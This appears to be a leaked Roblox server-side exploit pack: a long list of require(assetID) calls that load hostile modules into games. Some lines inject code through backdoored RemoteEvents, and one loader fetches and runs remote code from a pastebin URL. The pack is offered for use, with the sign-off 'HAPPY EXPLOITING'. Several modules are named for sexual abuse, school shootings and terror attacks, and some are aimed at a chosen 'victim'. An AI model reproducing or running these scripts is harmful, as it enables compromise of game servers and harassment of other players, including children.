I leaked this for some reasons. some of this are paid so enjoy :3
Bad SS Executor, I Recommend buying an exploit that just can execute ss its much better.
Its an sspack. enjoy.



require(2973851516).load("Victim") pedo van [replace the word Victim with the person you want to use it on]



require(2974012915).load("Your Roblox Username") Nuclear Gun [hold down left mouse button and hold z to shoot]


require(2974055072).load("Your Roblox Username") Shinobi-Armor [F enters fight mode] [G enters sword mode]


require(2974081149).load("Your Roblox Username") OP Wings [just flys and is massive]


require(2974126877).load("Your Roblox Username") OP AF Sword Armoury [not really that OP]


require(2974147684).load("Your Roblox Username") Red Claws 

require(2975155038).load("Your Roblox Username") JOJO Girl

require(2974181326).load("Your Roblox Username") Zeus Staff [very OP can destroy building becareful]
 

require(2974190388).load("Your Roblox Username") [don't press j you will get stuck after an effect]


require(2974204001).load("Your Roblox Username") RED TITAN [this boi fast AF]


require(2974212214).load("Your Roblox Username") The Red Assasin Powered with madness


require(2974223397).load("Your Roblox Username") GREEN CLAWS [lots of options to explore]


require(2974246593).load("Your Roblox Username") something raer [screen is broken idk why but still usable]
 

require(2974459570).load("Your Roblox Username") god of darkness [stuck in ground but reallycool]


require(2974705392).load("Your Roblox Username") pistols of crystal power


require(2974742698).load("Your Roblox Username") sniper [kinda cool but sometimes glitchy don't press x you will be stuck in first person]


require(2974839973).load("Your Roblox Username") random robot [useless]


require(2974869441).load("Your Roblox Username") allah akbah [BOOMY]


require(2974892351).load("Your Roblox Username") gun and sword [little bit OP] 


require(2670071430).load("Your Roblox Username") another SS GUI [say boi/] 20


require(2973395901).load("Your Roblox Username") wrench of destiny


require(2975123837).load("Your Roblox Username") OP titan 


require(2975155038).load("Your Roblox Username") girly that can change colours? [just test it out its cool]


require(2975213751).load("Your Roblox Username") The World Gauntlets [hold down left mouse button]


require(2975232195).load("Your Roblox Username") noob bat


require(2975245325).load("Your Roblox Username") smoke weed [useless but funny]


require(2975283395).load("Your Roblox Username") giant with a sword [glitchy]


require(2975300762).load("Your Roblox Username") giant with a comb sword [has a gltiched head]


require(2975311847).load("Your Roblox Username") sniper2 [need to be a good aim XD]


require(2975367593).load("Your Roblox Username") god of destruction [lil bit glitchy]


require(2975395328).load("Your Roblox Username") black cape dio


require(2975407709).load("Your Roblox Username") black grenade handbag


require(2975417519).load("Your Roblox Username") black hooded punching thief


require(2975430235).load("Your Roblox Username") black sword and shield warrior


require(2975449212).load("Your Roblox Username") Bladed Black Gauntlets


require(2975457408).load("Your Roblox Username") Bladed Black Titan


require(2975464346).load("Your Roblox Username") Blazing Heart Sword [pretty OP]


require(2975480225).load("Your Roblox Username") Bleach [you know what it does XD also drink 4 times to die]


require(2975502959).load("Your Roblox Username") Bob The Builder [gotta press F then start clicking]


require(2975510336).load("Your Roblox Username") Bodyguards [idk how they work] 40


require(2975519373).load("Your Roblox Username") Fighting Blob Monster 


require(2841156534):Fire('Your Roblox Username','i baked you a pie') -- John Doe module


Insanity Powers: require(2787111216):Run('Your Roblox Username','i baked you a pie')


Sin Unleashed: require(2787132106):Run('Your Roblox Username','i baked you a pie')


Dualecider: require(2790149731):Run('Your Roblox Username','i baked you a pie')


Unexpected Item: require(2796959576).Run()


Voodoo Child: require(2797271382):Run('Your Roblox Username','i baked you a pie')


Kermit Gui: require(2797382794):Kermit('Your Roblox Username')


IS GONE!!: require(2800498919):Run('Your Roblox Username','i baked you a pie')


Country Roads Admin: require(2808676257):hack'Your Roblox Username'


Gun Giver: require(2823974237).giveGuns'Your Roblox Username'


School Shooter: require(2826823504):Run('Your Roblox Username','i baked you a pie')


Grab Knife V1: require(2836693511):Fire('Your Roblox Username','i baked you a pie')


Grab Knife V2: require(2845941230):Fire('Your Roblox Username','i baked you a pie')


Grab Knife V3: require(2829943043):Run('Your Roblox Username','i baked you a pie')


Grab Knife V4: require(2845928453):Fire('Your Roblox Username','i baked you a pie')


Boom X4: require(2830670878):Run('Your Roblox Username','i baked you a pie')


Darkage Wristbands: require(2841203226):Fire('Your Roblox Username','i baked you a pie')


Hell's Door: require(2841174713):Fire('Your Roblox Username','i baked you a pie')


John Doe: require(2841156534):Fire('Your Roblox Username','i baked you a pie') 60


Quantom Rewritten: require(2848219801):Fire('kermitwashere,ok','Your Roblox Username')


Doki Doki DIE: require(2849585171):Fire('Your Roblox Username','i baked you a pie')


Deadeye: require(2849593796):Fire('Your Roblox Username','i baked you a pie')


Angel: require(2849601715):Fire('Your Roblox Username','i baked you a pie')


Uganda Knuckles: require(2849713774):Fire('Your Roblox Username','i baked you a pie')


Da Warden: require(2849623031):Fire('Your Roblox Username','i baked you a pie')


Meme Jevil: require(2855997192):Fire('Your Roblox Username','i baked you a pie')


Vaporgun: require(2856028839):Fire('Your Roblox Username','i baked you a pie')


Voodoo Child Meme: require(2858514503):Fire('Your Roblox Username','i baked you a pie')


Trap Rifle: require(2858526948):Fire('Your Roblox Username','i baked you a pie')

Psychocider: require(2866649197):Fire('Your Roblox Username','i baked you a pie')

Stupid GUI: require(2904213233):Fire('Your Roblox Username','i baked you a pie')

khols admin epix edit: require(522666193).giveAdmin("Your Roblox Username")  

Star Glitcher   working: require(2930987220).load('Your Roblox Username')   

spectrum glitcher wokring: require(2844773931).load("Your Roblox Username")   

SS Gui wait 3s and say boi/ in chat: require(2670071430).load("Your Roblox Username") 

Nebula Star glicher bypass working: require(2860424822)("Your Roblox Username","nebulastar") 

memes animations: require(2860424822)("Your Roblox Username","memes")   

Koolaid Man: require(2923173766):Kermit('Your Roblox Username',game.JobId)

Xester: require(2918747265).load("Your Roblox Username") 

Krystal Dance V2: require(2881162369):Fire('Your Roblox Username','i baked you a pie')

Memeus V3: require(2881262129):Fire('Your Roblox Username','i baked you a pie')

Kermit Chathax: require(2906086283):Fire('Your Roblox Username','PsevQrhKhxNxNcf')

Cart: require(2945393344).load"Your Roblox Username"

Rick And Morty Remote: require(2944367975).load"Your Roblox Username"

Pen: require(2913342850).load"Your Roblox Username"

Pokeball: require(2945268608).load"Your Roblox Username"

Cop: require(2874956884):Fire("Your Roblox Username") 

Scp 106: require(2913616665).load("Your Roblox Username") 

Eyo-Zen: require(2965943657):Fire("Your Roblox Username")

Agent Agony: require(2877501109):Fire("Your Roblox Username")
[AGENT HOTKEYS: Y, F, T, Z, V, M]

Rifle: require(2908373119):Fire("Your Roblox Username","i baked you a pie") 90

Golden Spinning Clock: require(2956258470).load("Your Roblox Username")

Ban Hammer: require(2953959989).load("Your Roblox Username")

Reaper V2: require(2954013343).load("Your Roblox Username")

Killbot: require(2954028244).load("Your Roblox Username")

Rainbow Sword/Knife: require(2954081775).load("Your Roblox Username")

BloxWatch: require(2954138784).load("Your Roblox Username")

Void Boss: require(2954172081).load("Your Roblox Username")

Dual Pink Guns: require(2954190022).load("Your Roblox Username")

Ender: require(2966080890):Fire("Your Roblox Username")

RuinEX: require(2966133043):Fire("Your Roblox Username")

Inked Monster: require(2966186555):Fire("Your Roblox Username")

Chara X[SOMETIMES GLITCHY]: require(2966195744):Fire("Your Roblox Username")

Huge Baseplate: require(2944212977).loadmap()

Cloud Visualizer: require(2966240496):Fire("Your Roblox Username")
[Cloud Visualizer Commands: !play SONGID !snow !rain !multiplier !volume 1-100 CHOOSE ONE]

Absylum V2: require(2966286498):Fire("Your Roblox Username")

Cube Of Polaris[useless]: require(2966359198):Fire("Your Roblox Username")

Plague Doctor: require(2966334796):Fire("Your Roblox Username")

Rocketeer: require(2966449101):Fire("Your Roblox Username")

Lunar Gauntlet:require(2966463800):Fire("Your Roblox Username")
[DON'T PRESS V OR IT GETS STUCK]

Aura Katana: require(2966514820):Fire("Your Roblox Username") 110

Super Sonic Running: require(2966563614):Fire("Your Roblox Username")

Hands purple projectile shooting: require(2966580162):Fire("Your Roblox Username")

SCP-999 GHOST[CAN'T MOVE JUST RESPAWN]: require(2966604558):Fire("Your Roblox Username")

Jump in the caac[looses time track]:require(2966615277):Fire("Your Roblox Username")

Bullet Bill[RESPAWN AFTER USE]: require(2966631086):Fire("Your Roblox Username")

Heavy[FUNNY AS FUCK, BROKEN]: require(2966638096):Fire("Your Roblox Username")

OP AIR MAGIC [WONT KILL OTHERS]:require(2966766781):Fire("Your Roblox Username")

Hokuto shinken: require(2966795270):Fire("Your Roblox Username")

The Box: require(2966790795):Fire("Your Roblox Username")

Dark Sword, Shield: require(2966786815):Fire("Your Roblox Username")

Noob: require(2969429312):Fire("Your Roblox Username") 120

Caducus: require(2969642892):Fire("Your Roblox Username")

Inferno: require(2969919470):Fire("Your Roblox Username")

God Slayer: require(2969861340):Fire("Your Roblox Username")

Agent Wheseker: require(2969940144):Fire("Your Roblox Username")

Video Power: require(2969906143):Fire("Your Roblox Username")

Pan: require(2965793312):Fire'Your Roblox Username'

Gorrupt Vectorist: require(2967640429).load("Your Roblox Username")

Meteor Powers: require(2967655899).load("Your Roblox Username")

The Glitch: require(2967664291).load("Your Roblox Username") 

Kartic: require(2967687879).load("Your Roblox Username")

Shackluster wheelies: require(2967700018).load("Your Roblox Username")  

Internal War: require(2967724627).load("Your Roblox Username")

Dominus Corona: require(2967742797).load("Your Roblox Username")

500 Pound Ball: require(2967750712).load("Your Roblox Username")

require(2967798014).load("Your Roblox Username") Baldi [PRESS F]

require(2967848153).load("Your Roblox Username") Skull Kid

require(2976973565).load("Your Roblox Username") Galaxy Sword 

require(2971448618):Fire("Your Roblox Username") Zamazu 

Blue Titan: require(2971509487).load("Your Roblox Username")

Golden Gun: require(2977809408):Fire("Your Roblox Username")

Red Blood Scythe: require(2971800799).load("Your Roblox Username")

Assasin's Creed Gauntlet: require(2971859278).load("Your Roblox Username") 142

thats all for now folks put this script into your main executor and execute into game for the SS executor

loadstring(game:HttpGet(("https://pastebin.com/raw/1jpqxbKn"),true))()

Thank you for supporting me don't forget to leave a review in the #how-was-your-purchase section of the discord

currently in release there are 142 scripts HEAPS more to come through in the next few weeks


require(2977016048).load("Your Roblox Username") Ace Of Diamonds 

require(2977023028).load("Your Roblox Username") Monk

require(2977044113).load("Your Roblox Username") Grapple Hooks [really glitchy]

require(2977047659).load("Your Roblox Username") Bomb om [pretty kool]

require(2977061215).load("Your Roblox Username") 9/11

require(2977073855).load("Your Roblox Username") Death Note [idk if this does anything]

require(2977093983).load("Your Roblox Username") Control Gui

require(2978778961).load("Your Roblox Username") world eater

require(2981059629).load("Your Roblox Username") domino's pizza

require(2984418010).load("Your Roblox Username") shadow lord

require(2984511783).load("Your Roblox Username") snup dog

require(2984879655).load("Your Roblox Username") Lua Hammer

require(2984911937).load("Your Roblox Username") pokeballs [has some music thats really delayed]

require(2984921335).load("Your Roblox Username") Toad [pretty stupid and useless but funny to show off and kills people when u walk into them]

require(2984944208).load("Your Roblox Username") Yellow Boy

require(2984954483).load("Your Roblox Username") spongebobs house

require(2984976316).load("Your Roblox Username") war machine

require(2985009308).load("Your Roblox Username") ice giant

require(2985019865).load("Your Roblox Username") chara [laggy af but OP af]

require(2985036980).load("Your Roblox Username") blackcell GUI [glitchy]

require(2985065669).load("Your Roblox Username") fords gun

require(2985076062).load("Your Roblox Username") Thomas The Tank Engine 

require(2985101287).load("Your Roblox Username") troll face [map killer]

require(2985155579).load("Your Roblox Username") gaster

require(2985153317).load("Your Roblox Username") some anime super powers?

require(2985164979).load("Your Roblox Username") soul reaper [pretty bad]

require(2985184326).load("Your Roblox Username") sword master [really nicely done but legs keep running when idle] 

require(2987299148).load("Your Roblox Username") thunder gun [Q to equip R to reload]

require(2987312314).load("Your Roblox Username") sniper [R to reload F to ready gun for shooting then just click]

require(2987331232).load("Your Roblox Username") Blue Sword [floating animation broke but still moves and sword works]


WELCOME TO UPDATE 1 WE HAVE ADDED A TOTAL OF 30 NEW MODULES WE HOPE YOU ENJOY HAPPY EXPLOITING 


stuff me pop converted and have just adding on

Insanity Powers: require(2787111216):Run('Player','i baked you a pie')


Sin Unleashed: require(2787132106):Run('Player','i baked you a pie')


Dualecider: require(2790149731):Run('Player','i baked you a pie')


Unexpected Item: require(2796959576).Run()


Voodoo Child: require(2797271382):Run('Player','i baked you a pie')


Kermit Gui: require(2797382794):Kermit('Player')


IS GONE!!: require(2800498919):Run('Player','i baked you a pie')


Country Roads Admin: require(2808676257):hack'Player'


Gun Giver: require(2823974237).giveGuns'playerYour Roblox Username'


School Shooter: require(2826823504):Run('Player','i baked you a pie')


Grab Knife V1: require(2836693511):Fire('Player','i baked you a pie')


Grab Knife V2: require(2845941230):Fire('Player','i baked you a pie')


Grab Knife V3: require(2829943043):Run('0eqr','i baked you a pie')


Grab Knife V4: require(2876526687).load("0eqr") --RARE AS FUCK

Boom X4: require(2830670878):Run('Player','i baked you a pie')


Darkage Wristbands: require(2841203226):Fire('Player','i baked you a pie')


Hell's Door: require(2841174713):Fire('Player','i baked you a pie')


John Doe: require(2841156534):Fire('Player','i baked you a pie')


Quantom Rewritten: require(2848219801):Fire('kermitwashere,ok','Your Roblox Username')


Doki Doki DIE: require(2849585171):Fire('Player','i baked you a pie')


Deadeye: require(2849593796):Fire('Player','i baked you a pie')


Angel: require(2849601715):Fire('Player','i baked you a pie')


Uganda Knuckles: require(2849713774):Fire('Player','i baked you a pie')


Da Warden: require(2849623031):Fire('Player','i baked you a pie')


Meme Jevil: require(2855997192):Fire('Player','i baked you a pie')


Vaporgun: require(2856028839):Fire('Player','i baked you a pie')


Voodoo Child Meme: require(2858514503):Fire('Player','i baked you a pie')


Trap Rifle: require(2858526948):Fire('Player','i baked you a pie')

require(522666193).giveAdmin("4ENI")  khols admin epix edit

require(2930987220).load('4ENI')   Star Glitcher     working 

require(2844773931).load("4ENI")   spectrum glitcher wokring 

require(2670071430).load("4ENI") SS Gui wait 3s and say boi/ in chat

require(2860424822)("4ENI","nebulastar") Nebula Star glicher bypass working 

require(2860424822)("4ENI","memes")   memes animations 

require(2918747265).load("4ENI") Xester

game.ReplicatedStorage.RemoteEvent:FireServer([[require(2829943043):Run('Your Roblox Username','i baked you a pie')]])

game.ReplicatedStorage.RemoteEvent:FireServer([[require(2797382794):Kermit('Your Roblox Username','i baked you a pie')]])

game.ReplicatedStorage.RemoteEvent:FireServer([[require(2845928453):Fire('Your Roblox Username','i baked you a pie')]])

game.ReplicatedStorage.RemoteEvent:FireServer([[require(2858526948):Fire('Your Roblox Username','i baked you a pie')]])

game.ReplicatedStorage.RemoteEvent:FireServer([[require(2856028839):Fire('Your Roblox Username','i baked you a pie')]])

require(2992183083):Fire("4ENI") -- RunicTunes

require(2992203195):Fire("4ENI") -- TrigorMortis

require(2992217896):Fire("4ENI") --  Horse

require(2992242058):Fire("4ENI") -- AWM

require(2992280097):Fire("4ENI") --  Ban hammer

require(2992285145):Fire("4ENI") -- Proteus

require(2992289083):Fire("4ENI") -- Scp 178

require(2992306347):Fire("4ENI") -- meme dances

require(2992309678):Fire("4ENI") -- Astronaut 13

require(2992330335):Fire("4ENI") -- Kirito blades

require(2992336852):Fire("4ENI") -- Banisher infinite

require(2992342114):Fire("4ENI") -- AK

require(2992345670):Fire("4ENI") -- Flaming sythe


converted by me 

require(2999197128).load("Your Roblox Username") --mustard gas
require(2999222031).load("Your Roblox Username") --Suicide pistol
require(2999224410).load("Your Roblox Username") --Suicide Injection
require(3001473028).load("Your Roblox Username") --Big boss
require(3001461356).load("Your Roblox Username") -- Thanos
require(3001443691).load("Your Roblox Username") -- Reanimated
require(3008245358).load("Your Roblox Username") --1x1x1x1
require(3008248262).load("Your Roblox Username") --Shadow Blade
require(3008250990).load("Your Roblox Username") --Nuke
require(3008253881).load("Your Roblox Username") --Sun god
require(3008255911).load("Your Roblox Username") --God slayer
require(3008241417).load("Your Roblox Username") --VideoPowers 
require(3008304767).load("Your Roblox Username") --Weed
require(3008590073).load("Your Roblox Username") --Bleach
require(3008592145).load("Your Roblox Username") --The Warden
require(3008594455).load("Your Roblox Username") --Noob bat
require(3008926930).load("Your Roblox Username") --Pandora
require(3009054978).load("Your Roblox Username") --World Eater
require(3009057853).load("Your Roblox Username") --Genocider
require(3009090587).load("Your Roblox Username") --Noobcider
require(3009638429).load("Your Roblox Username") --Sadist Genocider
require(3009639685).load("Your Roblox Username") --DeadSpace Gun
require(3009640806).load("Your Roblox Username") --Chaniac
require(2972165308).load("Your Roblox Username") --Noob guy
require(2973851516).load("Your Roblox Username") --Clown van (put victims Your Roblox Username not yours)
require(02980623094).load("Your Roblox Username") --Kill bot
require(2979955535).load("Your Roblox Username") --Project (no)
require(2972136307).load("Your Roblox Username") --Pee (does nothing)
require(3013940283).load("Your Roblox Username") --PPSH-41
require(3024043748):Start("Your Roblox Username","AAA") --Gears
require(3024941794).load("Your Roblox Username")  --Draw
require(2906086283):Fire('Your Roblox Username','PsevQrhKhxNxNcf') --chathax
require(2505714651).fuc("Your Roblox Username","VICTIM") --RAPE
require(3043256820).load("Your Roblox Username") --Fap script
require(2595582545).mbye("Your Roblox Username") --Mrbyebye 
require(2594357090).bban("Your Roblox Username") --Big ban
require(2453442372).load("Your Roblox Username") --R6
require(3072001307):Fire("Your Roblox Username") --Ice cream
require(3062381686).load("Your Roblox Username") --Grab Gun
require(3077451807).load('xd','Your Roblox Username') --Exoliner
require(3080597771).RepItOPREewjFJ("Your Roblox Username") --UTG
require(3100170325).load("Your Roblox Username") --Dogdick
require(3115990867)() --Admin Drahazzar
require(2876526687).load("Your Roblox Username") --RARE AS FUCK GRAB V4
require(3043952668).MMLHax("Your Roblox Username","mmlhax") --Moded mml